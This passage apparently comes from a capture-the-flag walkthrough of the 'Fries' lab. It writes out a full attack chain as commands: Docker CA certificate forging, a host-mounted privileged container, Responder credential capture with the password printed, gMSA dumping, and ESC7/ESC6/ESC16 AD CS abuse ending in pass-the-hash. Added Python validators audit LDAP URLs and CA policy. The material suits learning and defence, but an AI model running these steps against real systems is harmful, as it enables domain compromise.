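The fix the audit points at is to export with sec=krb5, krb5i or krb5p so access is tied to a Kerberos principal rather than a client-asserted GID, to keep root_squash, and to narrow the client list; the third sample line passes for that reason.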

We zip the certificates:
zip certs.zip ca.pem ca-key.pem server-openssl.cnf

Then we upload the zip to the svc@web machine.

The Docker daemon listens on port 2376.

In server-openssl.cnf, change CN = fries to CN = root.

Q: How can a non-privileged user interact with Docker without being in the docker group?
A: If the Docker daemon is configured to listen on a TCP socket (e.g., 127.0.0.1:2375) with TLS mutual authentication enabled, any user who possesses a valid client certificate signed by the Docker CA can authenticate to the Docker API over TLS, bypassing the need for Unix socket access or docker group membership. The daemon only verifies that the client certificate chains to its configured CA, so the whole scheme rests on the CA private key staying secret; here ca-key.pem was readable from the NFS export.
[Docker Socket Security: A Critical Vulnerability Guide](https://medium.com/@instatunnel/docker-socket-security-a-critical-vulnerability-guide-76f4137a68c5)
openssl genrsa -out root.key 2048
openssl req -new -key root.key -out root.csr -config server-openssl.cnf
openssl x509 -req -in root.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out root-cert.pem -days 365 -sha256 -extensions req_ext -extfile server-openssl.cnf
mv root-cert.pem cert.pem
mv root.key key.pem
chmod 600 key.pem
export DOCKER_HOST=tcp://127.0.0.1:2376
export DOCKER_TLS_VERIFY=1
export DOCKER_CERT_PATH=/home/svc/.docker

# List available images
docker images
# run a privileged container from the image with the host root filesystem mounted at /host
docker run -it --privileged -v /:/host --entrypoint /bin/bash IMAGE_ID
# user flag
cat /host/root/user.txt

cat /host/root/scripts/pwm/config/PwmConfiguration.xml | grep "\$2y"

Crack the bcrypt hash with the rockyou wordlist.
On pwm.fries.htb, open the Configuration Editor and enter the recovered password.

# run Responder to capture the password
sudo responder -I tun0
Navigate to LDAP -> LDAP Directories -> Default -> Connections, edit the LDAP URLs to point at the attacker IP (ldap://10.10.x.x:389) and click Test LDAP Profile. PWM performs a simple bind against that URL, and Responder captures the cleartext password of svc_infra: m6tneOMAh5p0wQ0d
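The Test LDAP Profile button leaks the service password for two independent reasons: the URL is plain ldap://, so the simple bind carries the password in cleartext, and the host is whatever the editor typed, so the bind goes to an unapproved server. Both are checkable before any connection is attempted. The following is an added example, not code from the writeup or from PWM: a validator for a list of configured LDAP URLs that rejects non-TLS schemes and hosts outside an approved set of domain controllers. TRUSTED_DCS and the sample URLs are constructed assumptions, not values taken from the machine's configuration.

```python
from urllib.parse import urlsplit

# Constructed assumption: the directory servers an operator would approve for fries.htb.
TRUSTED_DCS = {'dc01.fries.htb'}
STANDARD_LDAP_PORTS = {389, 636, 3268, 3269}


def check_ldap_url(url: str, trusted_hosts: set[str] = TRUSTED_DCS) -> list[str]:
    """Return the problems with one configured LDAP URL (empty list means acceptable)."""
    problems: list[str] = []
    try:
        parts = urlsplit(url)
        port = parts.port            # raises ValueError on a non-numeric port
    except ValueError as exc:
        return [f'unparseable URL: {exc}']
    scheme = parts.scheme.lower()
    host = (parts.hostname or '').lower()   # urlsplit already lowercases hostname
    if scheme not in ('ldap', 'ldaps'):
        return [f'unexpected scheme {scheme!r}']
    if scheme == 'ldap':
        # Simple bind over ldap:// puts the bind DN and password on the wire in the clear.
        problems.append('ldap:// without TLS: a simple bind sends the bind password in cleartext')
    if not host:
        problems.append('URL has no host')
    elif host not in {h.lower() for h in trusted_hosts}:
        problems.append(f'{host} is not an approved directory server')
    if port is not None and port not in STANDARD_LDAP_PORTS:
        problems.append(f'non-standard port {port}')
    return problems


def check_ldap_urls(urls, trusted_hosts=TRUSTED_DCS) -> dict[str, list[str]]:
    return {u: check_ldap_url(u, trusted_hosts) for u in urls}


def is_safe_profile(urls, trusted_hosts=TRUSTED_DCS) -> bool:
    """True only when every configured URL passes; a connection test should be refused otherwise."""
    return all(not p for p in check_ldap_urls(urls, trusted_hosts).values())


if __name__ == '__main__':
    # Constructed URLs: the legitimate DC over TLS, the same DC without TLS, an unapproved host.
    sample = ['ldaps://DC01.fries.htb:636', 'ldap://dc01.fries.htb:389', 'ldap://10.10.14.5:389']
    for url, probs in check_ldap_urls(sample).items():
        print(url, '->', 'OK' if not probs else '; '.join(probs))
```

A URL check does not replace certificate validation on the ldaps connection itself (the client must still verify the server certificate against the domain CA), but it stops the obvious misuse of a self-service "test connection" feature: binding with stored credentials to a host nobody approved.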


python3 gMSADumper.py -d fries.htb -u 'svc_infra' -p '<PASSWORD>'


certipy-ad find -u 'gMSA_CA_prod$' -hashes '<HASH>' -dc-ip 10.10.11.96 -vulnerable -enabled

Q: How was this misconfiguration detected?
A: Using Certify we enumerated CA permissions and observed that FRIES.HTB\gMSA_CA_prod was listed under ManageCa. Certify also flagged ESC7, a vulnerability category covering dangerous CA-level permissions that enable ESC6/ESC16 abuse.
evil-winrm -i fries.htb -u 'gMSA_CA_prod$' -H '<HASH>'

# Create CA admin COM object
$CA = New-Object -ComObject CertificateAuthority.Admin
$Config = "DC01.fries.htb\fries-DC01-CA"
# --- ESC6: Enable EDITF_ATTRIBUTESUBJECTALTNAME2 ---
$current = $CA.GetConfigEntry($Config, "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy", "EditFlags")
Write-Host "Current EditFlags: $current"
$new = $current -bor 0x00040000
Write-Host "New EditFlags: $new"
$CA.SetConfigEntry($Config, "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy", "EditFlags", $new)
# --- ESC16: Disable NTDS CA Security Extension ---
$CA.SetConfigEntry($Config, "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy", "DisableExtensionList", "1.3.6.1.4.1.311.25.2")
# Restart Certificate Services (once is enough)
Restart-Service certsvc -Force
# Verification
certutil -config "DC01.fries.htb\fries-DC01-CA" -getreg policy\EditFlags
certutil -config "DC01.fries.htb\fries-DC01-CA" -getreg policy\DisableExtensionList
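The two certutil -getreg commands above print exactly the two policy-module values that ESC6 and ESC16 depend on, which also makes them the values to monitor. The following is an added example, not part of the writeup: it parses saved certutil -getreg output for EditFlags and DisableExtensionList and reports whether EDITF_ATTRIBUTESUBJECTALTNAME2 (0x40000, as in the PowerShell above) is set and whether the NTDS CA security extension OID 1.3.6.1.4.1.311.25.2 is disabled. SAMPLE_CERTUTIL_OUTPUT is a constructed text in the shape certutil prints, not a capture from this machine; the flag-name table is the subset of certsrv.h EditFlags bits that appear in a default CA configuration.

```python
import re

EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000
NTDS_CA_SECURITY_EXT = '1.3.6.1.4.1.311.25.2'   # szOID_NTDS_CA_SECURITY_EXT

# Subset of EditFlags bits (certsrv.h) present in most default configurations.
EDIT_FLAG_NAMES = {
    0x00000002: 'EDITF_REQUESTEXTENSIONLIST',
    0x00000004: 'EDITF_DISABLEEXTENSIONLIST',
    0x00000008: 'EDITF_ADDOLDKEYUSAGE',
    0x00000040: 'EDITF_BASICCONSTRAINTSCRITICAL',
    0x00000100: 'EDITF_ENABLEAKIKEYID',
    0x00010000: 'EDITF_ENABLEDEFAULTSMIME',
    0x00040000: 'EDITF_ATTRIBUTESUBJECTALTNAME2',
    0x00100000: 'EDITF_AUDITCERTTEMPLATELOAD',
}

# Constructed sample in the layout certutil -getreg prints (not a capture from DC01).
SAMPLE_CERTUTIL_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\fries-DC01-CA\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40
    EDITF_ENABLEAKIKEYID -- 100
    EDITF_ENABLEDEFAULTSMIME -- 10000
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000
    EDITF_AUDITCERTTEMPLATELOAD -- 100000
CertUtil: -getreg command completed successfully.

  DisableExtensionList REG_MULTI_SZ =
    0: 1.3.6.1.4.1.311.25.2
CertUtil: -getreg command completed successfully.
"""

_DWORD_RE = re.compile(r'^\s*EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)', re.M)
_MULTI_HEADER_RE = re.compile(r'^\s*DisableExtensionList\s+REG_MULTI_SZ\s*=', re.M)
_MULTI_ITEM_RE = re.compile(r'^\s*\d+:\s*(\S+)')


def parse_edit_flags(text: str):
    """Return EditFlags as an int, or None when the value is absent."""
    m = _DWORD_RE.search(text)
    return int(m.group(1), 16) if m else None


def parse_disable_extension_list(text: str) -> list[str]:
    """Return the OIDs listed under DisableExtensionList (indented 'N: oid' lines)."""
    m = _MULTI_HEADER_RE.search(text)
    if not m:
        return []
    oids = []
    for line in text[m.end():].splitlines()[1:]:   # skip the rest of the header line
        item = _MULTI_ITEM_RE.match(line)
        if not item:
            break
        oids.append(item.group(1))
    return oids


def decode_edit_flags(value: int) -> list[str]:
    """Name every set bit; unknown bits are reported as hex so nothing is silently dropped."""
    return [EDIT_FLAG_NAMES.get(1 << b, f'0x{1 << b:08x}') for b in range(32) if value & (1 << b)]


def audit_ca_policy(text: str) -> list[str]:
    """Findings for the two CA policy settings that ESC6 and ESC16 turn on."""
    findings = []
    flags = parse_edit_flags(text)
    if flags is None:
        findings.append('EditFlags not found in input')
    elif flags & EDITF_ATTRIBUTESUBJECTALTNAME2:
        findings.append('ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 is set, so any enrollee can supply '
                        'an arbitrary SAN; clear it with '
                        'certutil -setreg policy\\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2')
    if NTDS_CA_SECURITY_EXT in parse_disable_extension_list(text):
        findings.append('ESC16: szOID_NTDS_CA_SECURITY_EXT is in DisableExtensionList, so issued '
                        'certificates no longer carry the requester SID used for strong mapping')
    return findings


if __name__ == '__main__':
    print('EditFlags:', ', '.join(decode_edit_flags(parse_edit_flags(SAMPLE_CERTUTIL_OUTPUT))))
    for f in audit_ca_policy(SAMPLE_CERTUTIL_OUTPUT):
        print('-', f)
```

Either finding changing on a CA that was clean yesterday is a high-signal event: both edits require ManageCA rights and a certsvc restart, so they should be rare and should line up with a change record. Run the check against each CA's saved -getreg output as part of routine AD CS review, and compare its output with the permissions audit (ManageCA holders) that surfaced the ESC7 path in the first place.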
Q: After enabling ESC6 and ESC16 using gMSA_CA_prod$, why couldn’t it directly request a certificate for administrator@fries.htb?
A: Although gMSA_CA_prod$ had the ManageCA permission (allowing it to modify CA policy and enable ESC6/ESC16), it lacked enrollment rights on the User certificate template. AD CS enforces template-level access control independently of CA-level permissions. Since gMSAs are machine-scoped accounts, they are typically not granted enrollment privileges on user-centric templates like User. Thus, the CA rejected the request with CERTSRV_E_TEMPLATE_DENIED.
certipy-ad req -u 'svc_infra' -p '<PASSWORD>' -dc-ip 10.10.11.96 -ca 'fries-DC01-CA' -template 'User' -upn 'administrator@fries.htb' -sid 'S-1-5-21-858338346-3861030516-3975240472-500'

sudo ntpdate 10.10.11.96
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.96

evil-winrm -i fries.htb -u 'administrator' -H 'a773c*****************48'
